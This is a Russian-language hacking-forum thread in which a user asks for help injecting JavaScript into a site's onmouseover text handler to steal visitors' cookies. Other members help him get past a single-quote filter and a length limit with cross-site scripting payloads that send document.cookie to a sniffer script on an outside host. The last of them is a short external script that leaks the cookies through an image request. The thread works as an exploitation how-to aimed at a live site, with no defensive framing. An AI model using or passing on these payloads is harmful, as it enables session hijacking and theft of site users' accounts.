Проблема в JavaScripts... Возможно ли такое?

Discussion in 'PHP' started by FoGorm, 5 Jan 2006.

  1. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Есть такая функция вывода текста:
    function show(text) {
    var s;
    s='<FONT STYLE="FONT-SIZE: 8pt;">'+text+'</FONT>';
    hint1.innerHTML=s;
    SetPosition();
    hint1.style.visibility='visible';
    }

    Она выводит на экран текст таким образом
    onmouseover="show('ТЕКСТ');"

    Помогите пожалуйста, можно ли вставить в show('СЮДА') еще одну ява функцию (например: alert(document.cookie);) если не розрешается использовать символ " ' " (одинарной кавычки), он заменяется на ‘ Также розрешается использовать любые символы вида &quot; , &amp; , &lt; и т.к.
    P.S. Если допускалось использование одинарной кавчки, я бы сделал так
    onmouseover="show('ТЕКСТ');alert(document.cookie);('');", т.е. просто бы вставил ');alert(document.cookie);('

    Но увы так нельзя... поэтому пришлось обращаться к вам за помощью :(
     
  2. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Уже нашел одно из решений, но всерано не могу добиться главного:
    Вот такое проходит: </script><img src=javascript:alert(document.cookie);><script>
    Но мне нужно чтобы кукисы не выводились а отправлялись на сниффер. Написал вот так вот:
    </script><img src=javascript:document.images[0].src=http://adress/sniff.php?+document.cookie;><script>
    Но выводит синтаскичискую ошибку... помогите розобраться, напомнаю использовать " ' " (одинарную кавычку) нельзя :(
     
  3. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    хана.. что за форум.. одно молчание :(
     
  4. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    src="http://adress/sniff.php?"+document.cookie;>
    так попробуй. Двойные ковычки то использывать можно?
     
  5. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Масса способов.
    Например
    </script><img src=javascript:document.images[0].src=&quot;http://adress/sniff.php?+document.cookie;&quot;><script>

    А вообще см. http://antichat.ru/crackchat/HTML/
    Там все есть.
     
  6. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    думаю двойные кавчки здесь не выход.. т.к. елси поставить двойную кавычку, то она закроет onmouseover=" вот эту.. но этого делать нельзя(
     
  7. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    &lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+document.cookie;&gt;&lt;script&gt;

    В итогде это все работает, но там стоит ограничение на кол-во символов.. так что если возможно.. то нужно сделать длинной не больше чем &lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+... вот посюда оно его обрезает.. последний штрих :)
     
  8. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    </script><script src=http://blablabla.ru/a.js></script>
     
  9. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Если можешь, напиши содержимое .js файла.. а то я плохо в яве розбираюсь, но то что ты предложил понял, и мне это видимо подходит...
     
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    a.js :
    Code:
    i = new Image();
    i.src="http://mysite.ru/sniff.pl?"+document.cookie;
     
    #10 Algol, 5 Jan 2006
    Last edited: 5 Jan 2006
  11. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Странно.. сделал ссылку.. но ничего не выводит... даж картинки не видно...
     
  12. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    А оно ничего и не должно выводить. Оно на сниф куки отсылает.